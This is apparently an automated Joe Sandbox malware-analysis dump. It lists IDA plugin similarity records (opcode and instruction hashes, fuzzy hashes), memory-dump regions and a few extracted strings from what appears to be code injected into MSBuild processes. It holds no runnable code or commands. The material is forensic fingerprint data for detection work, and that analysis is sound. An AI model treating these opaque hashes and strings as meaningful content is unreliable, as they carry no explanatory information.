                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5525ee164853c451c3d98674ba6f7387d14dd8bd6a298ff166c2434519484064
                                                                                                                      • Instruction ID: 911ed84483a926d62c0057ceb4493098af257b04fe388e47ab6da42f29731618
                                                                                                                      • Opcode Fuzzy Hash: 5525ee164853c451c3d98674ba6f7387d14dd8bd6a298ff166c2434519484064
                                                                                                                      • Instruction Fuzzy Hash: 94410574E11209EFCB18DFB4E494AAEBBB2BF89300F645429E405B7390DB759882CF54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 936acb5a5df9dcdffb2ff7acc6eeb540abf57963c63071f9c55e0a5380aa1ad3
                                                                                                                      • Instruction ID: d24c86d79978b91b99a47b8d53ae350ef301658afd5f4b4dbf02290327adb984
                                                                                                                      • Opcode Fuzzy Hash: 936acb5a5df9dcdffb2ff7acc6eeb540abf57963c63071f9c55e0a5380aa1ad3
                                                                                                                      • Instruction Fuzzy Hash: B4415C302117015FD316EB24D985B9ABBA2EF81310F80CE6CC1468B6A6DF74F98CCB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4138283630.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5e40000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c6ab485bef7a553d331de909e8ddd07e00e1a1e66880a0cde072035bf96af745
                                                                                                                      • Instruction ID: 1e970233844ff0942f9ad4cabd5f398cd81e7a2ffdc46f6aca5ad3b8ef9eccba
                                                                                                                      • Opcode Fuzzy Hash: c6ab485bef7a553d331de909e8ddd07e00e1a1e66880a0cde072035bf96af745
                                                                                                                      • Instruction Fuzzy Hash: B641D075E01309CFCB19DFB8E494AAEBBB2BF4A304F20A469D415B7250DB359882CF54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 25fdb5d221dd5c4f7e8fe3a5ee917b1545ad2a6434065eea5c8bca0c553208fa
                                                                                                                      • Instruction ID: aadd2bed2f59eefba6ee090c537981a733ea1636748c609fced651e2759f39dc
                                                                                                                      • Opcode Fuzzy Hash: 25fdb5d221dd5c4f7e8fe3a5ee917b1545ad2a6434065eea5c8bca0c553208fa
                                                                                                                      • Instruction Fuzzy Hash: 6B317935B102059FDB15DF38D898AAEBBB2FF89300B508469E906CB365DB35ED45CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bfde2d63b6fd868da0f67534baadedaf72ea845fb76b70fa352e90da929f1137
                                                                                                                      • Instruction ID: 3a28662ad4fb979509ec6790f6519b7467a2727d04af180a9af9c97d3ff4ef09
                                                                                                                      • Opcode Fuzzy Hash: bfde2d63b6fd868da0f67534baadedaf72ea845fb76b70fa352e90da929f1137
                                                                                                                      • Instruction Fuzzy Hash: 5A41AF74E002099FDB18DFA9D998AEDBBF2EF89301F14812AE815B3294DB745942CF14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f5c89a046233e8d50e523d9358b256f964b422313b019c34e944804eee1d7a56
                                                                                                                      • Instruction ID: 4cd88684f74ec1d8d25d035f19cc312404add2eb9e80e0a8cbbd1c4a0d2fc35b
                                                                                                                      • Opcode Fuzzy Hash: f5c89a046233e8d50e523d9358b256f964b422313b019c34e944804eee1d7a56
                                                                                                                      • Instruction Fuzzy Hash: 2F31E275E112089FCB04DFA9E5849EDB7F6BF89310F24826AE405B7365E7709A41CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ac04d0f300b1d9bf658f7e01478bc8efa09a087f89622eab60902417db3a3309
                                                                                                                      • Instruction ID: 01b396631e27cd0688c236a18d16f91d9317c8af5f0ce9a8a29f47bb60b45524
                                                                                                                      • Opcode Fuzzy Hash: ac04d0f300b1d9bf658f7e01478bc8efa09a087f89622eab60902417db3a3309
                                                                                                                      • Instruction Fuzzy Hash: 0521A3343513012FF705AB329866B7F7A63EBC1250F498928D5128F2A8DD79DD4E9394
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4f54a652fb0e891758fe7df9cb5ddc3e51e3be0e8bd05c1e3a748fb6fa12b82d
                                                                                                                      • Instruction ID: 7e07a30ada21b559eb8ad281b21bc6a5d03a6bb10b15bc5aa81607ec0d6f61f1
                                                                                                                      • Opcode Fuzzy Hash: 4f54a652fb0e891758fe7df9cb5ddc3e51e3be0e8bd05c1e3a748fb6fa12b82d
                                                                                                                      • Instruction Fuzzy Hash: 8531C274E042099FDB18DFAAD8486DDFBF2AF89301F14852AE811B7294DBB40942CF14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 20663d08f10cd41bc7c544cbd11cdb6f74c6d6a0d4087b33d614d2dbfa4e6dfe
                                                                                                                      • Instruction ID: e56bb04b6f2cd5b78a23e5c05057a85aef504a32c62958abb9aedc71af1b718f
                                                                                                                      • Opcode Fuzzy Hash: 20663d08f10cd41bc7c544cbd11cdb6f74c6d6a0d4087b33d614d2dbfa4e6dfe
                                                                                                                      • Instruction Fuzzy Hash: 332141343512012FE715BB329856B7F7A63EBC0290F458938D5128F2A8DD79ED4E9394
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7e0a96b0b16ebea03494995c6149375f92b091d4e6eb227472935484d9019bdd
                                                                                                                      • Instruction ID: 4589de06b50cced5526408c44ac67d42a057e7b8bbaa256c34711ba40258536a
                                                                                                                      • Opcode Fuzzy Hash: 7e0a96b0b16ebea03494995c6149375f92b091d4e6eb227472935484d9019bdd
                                                                                                                      • Instruction Fuzzy Hash: 2E21F771E112089FCB04DFA9E9889DDBBF6FF88310F14816AE405B7365EB709A45CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e987928dcfeeb8f4584a7083bb64eec943ae840e4271d23e68788f8c00e5802f
                                                                                                                      • Instruction ID: 22642cd4660d6feca901cc2fffedbbc664231f2df30db880f3e33e723986c286
                                                                                                                      • Opcode Fuzzy Hash: e987928dcfeeb8f4584a7083bb64eec943ae840e4271d23e68788f8c00e5802f
                                                                                                                      • Instruction Fuzzy Hash: B8312530E11209DFCB04DFA9D548ADDBBF6FF89310F14826AE505BB264E7709A45CB94
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120173307.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_129d000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1f5ab36bde08cbf42d2e37a27ce4dec79dac84522374e57b995c4ad24e553369
                                                                                                                      • Instruction ID: aa84391de4b0916a75225ab5bfecb08f5ae524bf1059bc07400a868515b4c72d
                                                                                                                      • Opcode Fuzzy Hash: 1f5ab36bde08cbf42d2e37a27ce4dec79dac84522374e57b995c4ad24e553369
                                                                                                                      • Instruction Fuzzy Hash: 8D2134B5514208DFDF01DF9CD9C0B2ABBA5FB84314F20C5ADD9094B256C37AD446DA61
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      • Instruction ID: 3cb1d16e3ecc19f8bb0db58933751b97b013dac5ce811e0f41d48c2761e0929a
                                                                                                                      • Opcode Fuzzy Hash: 893662a052a1d8fbace3593f560bf0dd56f957dcd401455fc6b3590d646a3845
                                                                                                                      • Instruction Fuzzy Hash: 3211D631E1010A9FCB01DFA8E5449DDBBB5EF49324F1582A6D414B7264DB34A945CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120173307.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_129d000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                      • Instruction ID: 9d8b30d166a0bd8954e6856b7c51f088f954528be375ad0010c64cf9a61070a3
                                                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                      • Instruction Fuzzy Hash: E511BB79504284CFDB02CF58D5C4B19BFA1FB84314F24C6AAD9494B256C33AD40ADF61
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: af737d5522a96a4a36f1bf6c121822b511287f9ec0bd139a820b05533c11d9c0
                                                                                                                      • Instruction ID: b54f6e74c0125bb43f29310147101f5889dbf32a7c5629848be6727eaa149159
                                                                                                                      • Opcode Fuzzy Hash: af737d5522a96a4a36f1bf6c121822b511287f9ec0bd139a820b05533c11d9c0
                                                                                                                      • Instruction Fuzzy Hash: 9A112871E1020A8BDB19DB69E41C6EEFAF2BF8C701F54C029D506A7290DB704849CBA5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 83a09b0652acb6ca806e3010bdcb296a2397e37c90f88a392e56782f01064e5e
                                                                                                                      • Instruction ID: 5d013cafc4a5f72f17677c5c33d3f99bb2a7d947bc737f0bd6ae9d31ca34c899
                                                                                                                      • Opcode Fuzzy Hash: 83a09b0652acb6ca806e3010bdcb296a2397e37c90f88a392e56782f01064e5e
                                                                                                                      • Instruction Fuzzy Hash: FCF02237B052226BFB15091B9818BBB2E9AEFC4362F094029EF0187280C52ACC6193A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4119814190.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_127d000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 90506bb804e1ba4c46027d92fb632decaa2bf3e3864d0377c66ae525a30a40af
                                                                                                                      • Instruction ID: 31858919a4d101f34e2ef37caf83d5edf0cb2fbd104e35138883b0883322be11
                                                                                                                      • Opcode Fuzzy Hash: 90506bb804e1ba4c46027d92fb632decaa2bf3e3864d0377c66ae525a30a40af
                                                                                                                      • Instruction Fuzzy Hash: A701297200E3C49FD7138B258894A52BFB4EF53224F19C1DBD9888F1A3C2699849C772
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4119814190.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_127d000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1641b79bc4bc6b1e76421612800b9aca0506676a1e9c07e1f0badab9627657e9
                                                                                                                      • Instruction ID: 8655d4e9e87d0dd14496e719fcbcbe53a5282b3236f31c63f6830de532f28451
                                                                                                                      • Opcode Fuzzy Hash: 1641b79bc4bc6b1e76421612800b9aca0506676a1e9c07e1f0badab9627657e9
                                                                                                                      • Instruction Fuzzy Hash: A0012B710183089EE7124AA9CD84767BF98EF413A4F18C529EE080B186C279D841C7B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9812416272252a4a358c778e77497f528dd07f8af80709bf17204a6ab966b7a5
                                                                                                                      • Instruction ID: 88fcc56eb0a1166820fe70b2637d124c9dbfa19cca68bf42cdb0cc260f774f17
                                                                                                                      • Opcode Fuzzy Hash: 9812416272252a4a358c778e77497f528dd07f8af80709bf17204a6ab966b7a5
                                                                                                                      • Instruction Fuzzy Hash: 0EF0B43BB0522667FB15484B9814FBF2A9BEBC4662F494029EF0587240C536CD61A3A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b60171c42fed9f6f532541639d7e7633e62e484776c081a5b7304b1f7f905b23
                                                                                                                      • Instruction ID: 785c4255de9357e243889f532841573557522e974ae0d82b5716646d1d144d0e
                                                                                                                      • Opcode Fuzzy Hash: b60171c42fed9f6f532541639d7e7633e62e484776c081a5b7304b1f7f905b23
                                                                                                                      • Instruction Fuzzy Hash: 2101A434720712CFDB359A79E608923B7F6BFC4205B94883DD5028A768EBB1E584CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bf456247c67953764f050ee44b9829bac4ea85d3a15466e2767c2f8add149600
                                                                                                                      • Instruction ID: d369a9511ff2ba4f0d49e02a01fd4d399b4bd946dc5dbfd4a77ed0d90e627991
                                                                                                                      • Opcode Fuzzy Hash: bf456247c67953764f050ee44b9829bac4ea85d3a15466e2767c2f8add149600
                                                                                                                      • Instruction Fuzzy Hash: 64F05973F292115BBB114A5D5C18ABA2FB2FAE5392389405DEB09CF110D532C822D361
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3e4f492130e74d97c3b662f9054aa95907bf26b4f4f0f0a8fd32c1bfa402e720
                                                                                                                      • Instruction ID: 066482c4126da546bb702ee57136b41125fc9f97d8b985f2048ed7024d021c77
                                                                                                                      • Opcode Fuzzy Hash: 3e4f492130e74d97c3b662f9054aa95907bf26b4f4f0f0a8fd32c1bfa402e720
                                                                                                                      • Instruction Fuzzy Hash: 40F09A31B54341AFCB45CA2AE4058AABBF6EBC6220328C06BF899CB711C6718C078B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c0f1193a74443d0703a1431bbd9417dfcbeada83f376b488dccdf86c74ffddd0
                                                                                                                      • Instruction ID: 32cac5abdffbda2d42529f86d418019b22450dff147ea2a66b014b4b6b24c398
                                                                                                                      • Opcode Fuzzy Hash: c0f1193a74443d0703a1431bbd9417dfcbeada83f376b488dccdf86c74ffddd0
                                                                                                                      • Instruction Fuzzy Hash: C4F0E2361207028FDB358A6ADA49B63B7F6FF80604F84887DD4424AB25E7B5F584CB80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8d2658b9ca09d2dbea99dd882cce348e1679fa40bbee1c6e021ed84771e432c9
                                                                                                                      • Instruction ID: 1398144c352a80d3db6965dad9bbfd93416464f071d4040ad5fb874b630d5ceb
                                                                                                                      • Opcode Fuzzy Hash: 8d2658b9ca09d2dbea99dd882cce348e1679fa40bbee1c6e021ed84771e432c9
                                                                                                                      • Instruction Fuzzy Hash: E9011DB058524ADFC702EF78F999A497BB5EB05308F044AB99404CB26EE7705949CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7e323c6f09a3e9026bdcaf464a2099bfc127686552d224a703dec08c8cc14d12
                                                                                                                      • Instruction ID: cb61ccda4f9acdf638ab93d14b850cf0581f28c6ccacc10bd6079ca95dad4b7f
                                                                                                                      • Opcode Fuzzy Hash: 7e323c6f09a3e9026bdcaf464a2099bfc127686552d224a703dec08c8cc14d12
                                                                                                                      • Instruction Fuzzy Hash: ADF0A470D1120ADFCB45EFB8D5446ADBBB0FF05304F1046AAD415A7254EB709A41CF81
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b2786ab4cb725d212dda4ddded2a3dee181aed2438c4b3dcd889cd9e743e07e4
                                                                                                                      • Instruction ID: a9ccd6ccdaf46d504a887f09e473c73a4e85cfe5b0ead89d46d2234180d98f34
                                                                                                                      • Opcode Fuzzy Hash: b2786ab4cb725d212dda4ddded2a3dee181aed2438c4b3dcd889cd9e743e07e4
                                                                                                                      • Instruction Fuzzy Hash: 48F0BDB054110EDFCB02FF68FA98A497BA5E744305F045A7594048722DE77069458F90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2eb754946641dc7abd4ad8ee7e8660defa1f692d4f294f592acc48c5e34b269a
                                                                                                                      • Instruction ID: c7168ff7a78fcdb58c47bc822b349814a51940bc6f203dafa7ce96ee73302b26
                                                                                                                      • Opcode Fuzzy Hash: 2eb754946641dc7abd4ad8ee7e8660defa1f692d4f294f592acc48c5e34b269a
                                                                                                                      • Instruction Fuzzy Hash: 2AF0B270D0020ADFCB44EFB8E5446AEBBB0FF04304F1046AAD415A7254EBB09A41CF80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$LR^q$LR^q$LR^q
                                                                                                                      • API String ID: 0-3320307730
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^q
                                                                                                                      • API String ID: 0-388095546
                                                                                                                      • Opcode ID: cadb44be667f5e77c8c1827eeb3ef305c5bb5f66244804fa59de3e21b0c2ef5b
                                                                                                                      • Instruction ID: d81816a8eac56c605ae3497b09e0ba0efe958c59bfbb3b6d6d3b11b8cc3b25b8
                                                                                                                      • Opcode Fuzzy Hash: cadb44be667f5e77c8c1827eeb3ef305c5bb5f66244804fa59de3e21b0c2ef5b
                                                                                                                      • Instruction Fuzzy Hash: 3DF1CB30B00205DFDB28DF68D994BAEBBF2BF88704F148469D50A9B295DB35EC46CB41
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 12dbe382deff07025933eef4b25988f3c0b8c482d94fa397c37b37b9f8c1d7f4
                                                                                                                      • Instruction ID: 26f28cc4e818f03c94e23f5a33776fca5fd0d04cdfd0c797b80094caeb806f4d
                                                                                                                      • Opcode Fuzzy Hash: 12dbe382deff07025933eef4b25988f3c0b8c482d94fa397c37b37b9f8c1d7f4
                                                                                                                      • Instruction Fuzzy Hash: CCE2BB30950319DBD725EF28CD44B99B7BAFF89B00F1189D5E5087B6A8CBB16AC1CB41
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 25f71f3d017df1b23b950cee42e24f2155b5cb65f5b0a8609ccb7ffa2d74f8b0
                                                                                                                      • Instruction ID: 24bb707c866ad4f7a4c935545e5d5247daa35b9ec7c4efae99327996f3ddb78d
                                                                                                                      • Opcode Fuzzy Hash: 25f71f3d017df1b23b950cee42e24f2155b5cb65f5b0a8609ccb7ffa2d74f8b0
                                                                                                                      • Instruction Fuzzy Hash: 7FE2BB30950319DBD725EF28CD44B99B7BAFF89B00F1189D5E5083B6A8CBB16AC1CB41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (bq$Hbq
                                                                                                                      • API String ID: 0-4081012451
                                                                                                                      • Opcode ID: f809576c88e093e4d10caac5872d0b270b4fcf34e85b7f88d9c14ba303a1f4ab
                                                                                                                      • Instruction ID: b31c490ae20a03cea39d2522007c70015aec7c3b28f76791a5c3d933a38a431e
                                                                                                                      • Opcode Fuzzy Hash: f809576c88e093e4d10caac5872d0b270b4fcf34e85b7f88d9c14ba303a1f4ab
                                                                                                                      • Instruction Fuzzy Hash: C651AF31E00248AFDB19DFA9A8116EEBFF2EF85310F1484BAD459D7251EB344A45CB91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^q$$^q
                                                                                                                      • API String ID: 0-355816377
                                                                                                                      • Opcode ID: 218e30852c8905067b9d4ce72ea8b957438281f83d6f096353f43b0db5c16823
                                                                                                                      • Instruction ID: f2c8cde410478432a8660116cce6ef34b7a5e277674378babda6174a5bd102ae
                                                                                                                      • Opcode Fuzzy Hash: 218e30852c8905067b9d4ce72ea8b957438281f83d6f096353f43b0db5c16823
